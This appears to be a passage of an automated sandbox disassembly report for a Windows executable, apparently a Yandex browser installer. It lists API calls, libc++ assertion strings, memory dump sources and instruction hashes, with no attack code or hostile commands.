                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 0084ED80
                                                                                                                        • ua-u, xrefs: 0084ECF8
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 0084ED87, 0084EF1B
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 0084ED79
                                                                                                                        • ua-r, xrefs: 0084ED0A
                                                                                                                        • /support/browser/about/install.xml, xrefs: 0084EE08, 0084EE16, 0084EE6C, 0084EE7A, 0084EEB3
                                                                                                                        • https://yandex., xrefs: 0084EDC9
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$/support/browser/about/install.xml$https://yandex.$ua-r$ua-u
                                                                                                                        • API String ID: 0-4180415026
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00000000,?,00000001), ref: 008D6BBD
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00000000), ref: 008D6C33
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,00000001,?,008AD1F0,?,008D50B1,00000001,?,?,008AC5DD,?,00000001,?), ref: 008D6D22
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 008D6C5E
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$Acquire$Release
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                                                                                        • API String ID: 1678258262-2888085009
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00966B40,?,?,00962570,009305AE,?,?,008AEA0C,00962570,?,?,?,?,?,?,-00000001), ref: 008B66D7
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00966B40,?,?,00962570,009305AE,?,?,008AEA0C,00962570,?,?,?,?,?,?,-00000001), ref: 008B6700
                                                                                                                        • _strlen.LIBCMT ref: 008B6789
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008B67E9
                                                                                                                          • Part of subcall function 008B6A20: _strlen.LIBCMT ref: 008B6A31
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 008B67D5
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock_strlen$AcquireInit_thread_headerRelease
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length
                                                                                                                        • API String ID: 539046703-3833978849
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,0092283D,00000002,00000000,?,?,?,0092283D,?,00000000), ref: 00922F20
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,0092283D,00000002,00000000,?,?,?,0092283D,?,00000000), ref: 00922F49
                                                                                                                        • GetACP.KERNEL32(?,?,0092283D,?,00000000), ref: 00922F5E
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID: ACP$OCP
                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 0085EE9D
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000,?,000003E8,00000000,?,?,?,00000000), ref: 0085EF1A
                                                                                                                        • GetTickCount.KERNEL32 ref: 0085EF3B
                                                                                                                        Similarity
                                                                                                                        • API ID: CountTick$ObjectSingleWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2051767920-0
                                                                                                                        Strings
                                                                                                                        • true, xrefs: 008B2565, 008B37A6, 008B37EA, 008B3832
                                                                                                                        • false, xrefs: 008B2560, 008B37AB
                                                                                                                        • null, xrefs: 008B2345, 008B2353, 008B247F, 008B3724, 008B375C, 008B376A
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008B30DE, 008B386C
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008B25F7, 008B29F8, 008B30D7, 008B3873
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008B30E5, 008B3865
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$false$null$true
                                                                                                                        • API String ID: 0-2153852974
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0091DF1A: GetLastError.KERNEL32(00000000,?,0091AB09), ref: 0091DF1E
                                                                                                                          • Part of subcall function 0091DF1A: SetLastError.KERNEL32(00000000,?,?,00000028,00914B7E), ref: 0091DFC0
                                                                                                                        • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0092280F
                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 0092284D
                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00922860
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 009228A8
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 009228C3
                                                                                                                        Similarity
                                                                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 415426439-0
                                                                                                                        • Opcode ID: bec5a48ca5e0676edf898c4bcaa50a7583b0f77221e58692007e0b741c5bb4d4
                                                                                                                        • Instruction ID: 38fd256ad4a4a5aaab92e35ec558952d68cdf8ed07d08d7936a9c99102f974c1
                                                                                                                        • Opcode Fuzzy Hash: bec5a48ca5e0676edf898c4bcaa50a7583b0f77221e58692007e0b741c5bb4d4
                                                                                                                        • Instruction Fuzzy Hash: 1A517C71A0422ABBDB20EFA5EC41BBA77BCBF48300F544469F901EB195E770DA40DB61
                                                                                                                        APIs
                                                                                                                        • __Init_thread_header.LIBCMT ref: 0089ADD2
                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 0089AE08
                                                                                                                        • GetProductInfo.KERNEL32(?,?,00000000,00000000,?), ref: 0089AE1F
                                                                                                                        • __Init_thread_header.LIBCMT ref: 0089AE7B
                                                                                                                          • Part of subcall function 008FFBA7: EnterCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBB2
                                                                                                                          • Part of subcall function 008FFBA7: LeaveCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBEF
                                                                                                                        • GetNativeSystemInfo.KERNEL32(0096599C), ref: 0089AEAC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalInfoInit_thread_headerSection$EnterLeaveNativeProductSystemVersion
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4213586224-0
                                                                                                                        • Opcode ID: 498c7b346f11009e1504112c9a91d35df2950784334492ae2b4af96f9ebface7
                                                                                                                        • Instruction ID: 37671aa5375ce38ee6d7195dc072eb73a65f3e38fd6b2261c2610c77bbf9dc05
                                                                                                                        • Opcode Fuzzy Hash: 498c7b346f11009e1504112c9a91d35df2950784334492ae2b4af96f9ebface7
                                                                                                                        • Instruction Fuzzy Hash: EC3138B1904A04DFDB20EB24EC46BAE7770FF85738F864229F50986291D7712954DFD2
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,0083EC4F,?,?,00000001,?,00858325,0083EC4F,BIN,?,0083EC4F,?,?), ref: 00858247
                                                                                                                        • FindResourceW.KERNEL32(00000000,0083EC4F,00858325,?,00858325,0083EC4F,BIN,?,0083EC4F,?,?,?,?,?,?,00976000), ref: 00858254
                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,00858325,0083EC4F,BIN,?,0083EC4F,?,?,?,?,?,?,00976000), ref: 00858262
                                                                                                                        • LockResource.KERNEL32(00000000,?,00858325,0083EC4F,BIN,?,0083EC4F,?,?,?,?,?,?,00976000), ref: 0085826F
                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00858325,0083EC4F,BIN,?,0083EC4F,?,?,?,?,?,?,00976000), ref: 008582C4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$FindHandleLoadLockModuleSizeof
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1601749889-0
                                                                                                                        • Opcode ID: 2f49a6ebe5b01632a28a9c2daa3180aff2191a39c6457ee8fe7b01ea7101b831
                                                                                                                        • Instruction ID: a38ba5b81111365b994bcfd3bcbcfecbb803bd4e56be5a56b1baeb24a54a873f
                                                                                                                        • Opcode Fuzzy Hash: 2f49a6ebe5b01632a28a9c2daa3180aff2191a39c6457ee8fe7b01ea7101b831
                                                                                                                        • Instruction Fuzzy Hash: F0119DB0A14305AFDB149B799C4493B7BA9FB88356B14852DE80AD7300EB30DC15DBA0
                                                                                                                        APIs
                                                                                                                        • AccessibleObjectFromWindow.OLEACC(?,FFFFFFFC,00933020,?,?,00000000,00000028,?,?,0084C8C9,?), ref: 00852A3A
                                                                                                                        • LresultFromObject.OLEACC(00933020,?,?), ref: 00852BA6
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00852A67
                                                                                                                        • =, xrefs: 00852B82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: FromObject$AccessibleLresultWindow
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$=
                                                                                                                        • API String ID: 133265567-2330902163
                                                                                                                        • Opcode ID: 24c4aa5ecf133a706d855f30ff5bf4b8636b4cdb1f5d4519e6746bc6317862ee
                                                                                                                        • Instruction ID: 28de1ec8f2319d4cb4c02581b86ab08b574d1c5b744fe1170d6dead0991c6a2a
                                                                                                                        • Opcode Fuzzy Hash: 24c4aa5ecf133a706d855f30ff5bf4b8636b4cdb1f5d4519e6746bc6317862ee
                                                                                                                        • Instruction Fuzzy Hash: C8710871B0020A8BCB18CF65C891A6BB7E6FF95721B14C53EEC16DB251DB30E954CB51
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00878538
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00878544
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                        • API String ID: 1646373207-706389432
                                                                                                                        • Opcode ID: afea8cbbbb29af8f8a65266dd0d40ae631b44b655202e28b5dab8aa0514eb11c
                                                                                                                        • Instruction ID: 689c2e7e31511c5cd20734fad5a22b63c7e8fb16cd86af641cabc46adb176655
                                                                                                                        • Opcode Fuzzy Hash: afea8cbbbb29af8f8a65266dd0d40ae631b44b655202e28b5dab8aa0514eb11c
                                                                                                                        • Instruction Fuzzy Hash: CED012306AC3049BC600BFE7BC09D15776CEA5571A3008415FC0CC2261EFB0D4006F50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e2e113a31e7206689e99cb9e3f8a5aa9fab270fba3d520fb0f91db4a2b51985d
                                                                                                                        • Instruction ID: 295cdf23544b400d2ee7032dafe5bafdd3bbffdf0894043fa305ec7804faf6ef
                                                                                                                        • Opcode Fuzzy Hash: e2e113a31e7206689e99cb9e3f8a5aa9fab270fba3d520fb0f91db4a2b51985d
                                                                                                                        • Instruction Fuzzy Hash: EF024A71E01219DBDF14CFA8C984AAEBBF5FF88314F248269D919B7340D731AA45CB90
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,-00000001,?,?,?,0089EF51,00000065,?,?,00000000), ref: 008A0BC9
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,-00000001,?,?,?,0089EF51,00000065,?,?,00000000), ref: 008A0D71
                                                                                                                          • Part of subcall function 0089FB70: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 0089FBEC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentDirectoryRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 904961151-0
                                                                                                                        • Opcode ID: dfef3128f9ba98c4ed56ab5a7195381f84dd1cd9a485a1152165da6fd83ffa7d
                                                                                                                        • Instruction ID: 05d55b2d7296427bbd825f0eb7d3178b52476d29438a4ed8925426d0c8e8dcd8
                                                                                                                        • Opcode Fuzzy Hash: dfef3128f9ba98c4ed56ab5a7195381f84dd1cd9a485a1152165da6fd83ffa7d
                                                                                                                        • Instruction Fuzzy Hash: A2C1B471F016099BEF14DF98D881AAEB7B2FF86314F188129E805EB741DB31AD46CB51
                                                                                                                        APIs
                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 009002F0
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 009003BC
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009003DC
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 009003E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 254469556-0
                                                                                                                        • Opcode ID: c30b93f59c3aa5842c6f2380cb6ddfab6acfb5309d6a7afa028bf5a0c776a350
                                                                                                                        • Instruction ID: bd41b040d3dda250cca3478148f4fd3f8b42b53f36b0a8d8800b65475e93cb2a
                                                                                                                        • Opcode Fuzzy Hash: c30b93f59c3aa5842c6f2380cb6ddfab6acfb5309d6a7afa028bf5a0c776a350
                                                                                                                        • Instruction Fuzzy Hash: 7B310775D5531D9FDF11EFA4D9897CDBBB8AF48300F1041AAE40DAB290EB705A848F44
                                                                                                                        APIs
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 008C8E45
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 008C8EAA
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$AcquireRelease
                                                                                                                        • String ID: MZx
                                                                                                                        • API String ID: 17069307-2575928145
                                                                                                                        • Opcode ID: 38f951f3617cf1f0368a9a6131350ef475552ccca4962e86c9801a353f4a1036
                                                                                                                        • Instruction ID: 2d68ba702f09733fca8c023f24ce9776b7977c439dfa793ac1efc35e07ba6bec
                                                                                                                        • Opcode Fuzzy Hash: 38f951f3617cf1f0368a9a6131350ef475552ccca4962e86c9801a353f4a1036
                                                                                                                        • Instruction Fuzzy Hash: FF519E72E64609CBCB14CE99D841BAEB7B6FB88324F18812DE505EB345DF31ED418B91
                                                                                                                        APIs
                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00900810
                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 0090082B
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoQuerySystemVirtual
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 401686933-2746444292
                                                                                                                        • Opcode ID: 4370428e8dc902d0f549dc5b7c093f8a87338ee4b3557be5732263a94eebbb8d
                                                                                                                        • Instruction ID: 2c62b227c6ad49797e33484d73c9aa50dc51d90dd5acc1fe7536bc54ea26752b
                                                                                                                        • Opcode Fuzzy Hash: 4370428e8dc902d0f549dc5b7c093f8a87338ee4b3557be5732263a94eebbb8d
                                                                                                                        • Instruction Fuzzy Hash: 31018472A00209AFDB14DE29DC05BEE7BADAFC4325F09C225AD59D7295EA34D941CAC0
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldiv
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3732870572-0
                                                                                                                        • Opcode ID: 5c729f36e4ecaf77eefd001a93e89cb39bd6a4eb122de4a27d8e4f7d4a517b0e
                                                                                                                        • Instruction ID: ccdd2a2ff945950afa90c8eb7dd3a8fb719404e3714468f5a20df315bdd0d404
                                                                                                                        • Opcode Fuzzy Hash: 5c729f36e4ecaf77eefd001a93e89cb39bd6a4eb122de4a27d8e4f7d4a517b0e
                                                                                                                        • Instruction Fuzzy Hash: 2D226B71A002099FCB18CF58C484AADB7F6FF88314B15C569E549EB3A5DB70AD44CFA4
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0091DF1A: GetLastError.KERNEL32(00000000,?,0091AB09), ref: 0091DF1E
                                                                                                                          • Part of subcall function 0091DF1A: SetLastError.KERNEL32(00000000,?,?,00000028,00914B7E), ref: 0091DFC0
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00922A54
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00922A9E
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00922B64
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 661929714-0
                                                                                                                        • Opcode ID: 9b1d9a0940df865ec2eea3f7695a50792440f14c1cee27bd0d760236fbfd85ad
                                                                                                                        • Instruction ID: 92955f7eb2a81f766b31cbd02992559ba69b263e822a631be8984864dea5d387
                                                                                                                        • Opcode Fuzzy Hash: 9b1d9a0940df865ec2eea3f7695a50792440f14c1cee27bd0d760236fbfd85ad
                                                                                                                        • Instruction Fuzzy Hash: D661B571A1022BAFDB28DF24DD82BBA73ACEF45300F2045BAED05C6589E774D981DB50
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00966B40,?,00000000,00000003,?,008B932E,00962588,?), ref: 008B64AE
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00966B40,?,00000000,00000003,?,008B932E,00962588,?), ref: 008B64D7
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008B6584
                                                                                                                          • Part of subcall function 008B6A20: _strlen.LIBCMT ref: 008B6A31
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$AcquireInit_thread_headerRelease_strlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2474859000-0
                                                                                                                        • Opcode ID: cf8b23766e4ac4f9e7ae9a6de1848668b882d8633146101dee04c697181325d2
                                                                                                                        • Instruction ID: bc9bba679bd15b20f77f5370ba16271764b5d140b23b59b62de873b017e6cd40
                                                                                                                        • Opcode Fuzzy Hash: cf8b23766e4ac4f9e7ae9a6de1848668b882d8633146101dee04c697181325d2
                                                                                                                        • Instruction Fuzzy Hash: 51517C72A18218DBCB24DF78DC52AAAB7A1FB80318F14012DD806D7395EB75ED21C7C2
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008FB2E6
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008FB2D7
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008FB2C8
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                                                                                        • API String ID: 0-2138987473
                                                                                                                        • Opcode ID: e50739581080df53a77a512d4d7dba5c87862e23c60f2b62e7f4418aff077c12
                                                                                                                        • Instruction ID: 963f4a6d762538fa83a16c5b8bacb4efe42a31796b6202ad4cc353598aab7d2d
                                                                                                                        • Opcode Fuzzy Hash: e50739581080df53a77a512d4d7dba5c87862e23c60f2b62e7f4418aff077c12
                                                                                                                        • Instruction Fuzzy Hash: 1C12E9B1B0021E8BCB18CF74C4906BA77A2FF84324F258569DA5ADB351DB31ED45C791
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008FAC82
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008FAC91
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008FAC73
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                                                                                        • API String ID: 0-1360549270
                                                                                                                        • Opcode ID: da60f09b95c61567c445410a29bb7fbaf77846be8b2f93a393916eb549c59bc5
                                                                                                                        • Instruction ID: 620266a6e025588c21b42cdbd18f9e5f27d1d912f6aae0eeb3449e9b71f7790b
                                                                                                                        • Opcode Fuzzy Hash: da60f09b95c61567c445410a29bb7fbaf77846be8b2f93a393916eb549c59bc5
                                                                                                                        • Instruction Fuzzy Hash: 1602FAB1A0022A8FCB1C8E38C4907BA7BA1FB85364F298179DA5DDB381D6749D45C7D2
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,00000001,?,008AD1F0,?,008D50B1,00000001,?,?,008AC5DD,?,00000001,?), ref: 008D6D22
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,00000001,?,008AD1F0), ref: 008D6E57
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$AcquireRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 17069307-0
                                                                                                                        • Opcode ID: dee89e350d34fd7559b6f8b82e6839e58ddb3622e30bbf2f30df7da3a433caf9
                                                                                                                        • Instruction ID: c9eb93e1a6f1a96774e2b64c3cb750c9d91a70d86444448b5a0c9946ed701d23
                                                                                                                        • Opcode Fuzzy Hash: dee89e350d34fd7559b6f8b82e6839e58ddb3622e30bbf2f30df7da3a433caf9
                                                                                                                        • Instruction Fuzzy Hash: 24610875F101098BCB149F6CDC4166EB7A7FB84710B288226E415EB351FB31DD118795
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,008C8BDA,?,?), ref: 008C8C2E
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?), ref: 008C8D73
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$AcquireRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 17069307-0
                                                                                                                        • Opcode ID: b229df2167aade141f5b9d3bfb3c7d25cd224756b00f40f6dbc3fd7cd9d3391b
                                                                                                                        • Instruction ID: 754238f9beebe8744acdfa60b4dee0c613b7948e28bfff060f1b8d2eb949962f
                                                                                                                        • Opcode Fuzzy Hash: b229df2167aade141f5b9d3bfb3c7d25cd224756b00f40f6dbc3fd7cd9d3391b
                                                                                                                        • Instruction Fuzzy Hash: A0519A71E512198BCB14DF59D840BAEB7B2FF98314F29812DE906EB241DB31ED018B92
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string:3605: assertion __n2 == 0 || __s != nullptr failed: string::compare(): received nullptr, xrefs: 00856E40
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00856E39
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\string:3605: assertion __n2 == 0 || __s != nullptr failed: string::compare(): received nullptr
                                                                                                                        • API String ID: 0-2865447378
                                                                                                                        • Opcode ID: 9d36fd8e36f200a0737ffa10afca0f292749d292aa6a8b711509a8e70db15b95
                                                                                                                        • Instruction ID: 362746e9a4f9e873714d255e5b399b3d13f953f54e5504abfac70d1a24b726cf
                                                                                                                        • Opcode Fuzzy Hash: 9d36fd8e36f200a0737ffa10afca0f292749d292aa6a8b711509a8e70db15b95
                                                                                                                        • Instruction Fuzzy Hash: 7522AE70E0061D9FCF15CFA8C4906AEBBB2FF45315F588119E815EB251EB31AD5ACB81
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Once$ExecuteInit
                                                                                                                        • String ID: dkT$dkT
                                                                                                                        • API String ID: 689400697-980905629
                                                                                                                        • Opcode ID: 557590f2505e4b0bcc2e4e10c96c04f0c65ded6a94870abad6614d5f08e8eca0
                                                                                                                        • Instruction ID: 572ad09ba693e4bf59b557782757f4565463f07959cfa6c6149f718bdad40aaa
                                                                                                                        • Opcode Fuzzy Hash: 557590f2505e4b0bcc2e4e10c96c04f0c65ded6a94870abad6614d5f08e8eca0
                                                                                                                        • Instruction Fuzzy Hash: FAC15F33F00B198F8B1CDA198A9616CAB6BA7C4700B57817FDD07EF161CAB1D905C5D1
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: __floor_pentium4
                                                                                                                        • String ID: VUUU$VUUU
                                                                                                                        • API String ID: 4168288129-3149182767
                                                                                                                        • Opcode ID: 40c714fb76464bae062011f5340520e655841e90be660978d8902a46daf8c6ea
                                                                                                                        • Instruction ID: f1a027fcdd0d6531ec1b31f559059e1274204a711beea7882c3d517c0879cf3f
                                                                                                                        • Opcode Fuzzy Hash: 40c714fb76464bae062011f5340520e655841e90be660978d8902a46daf8c6ea
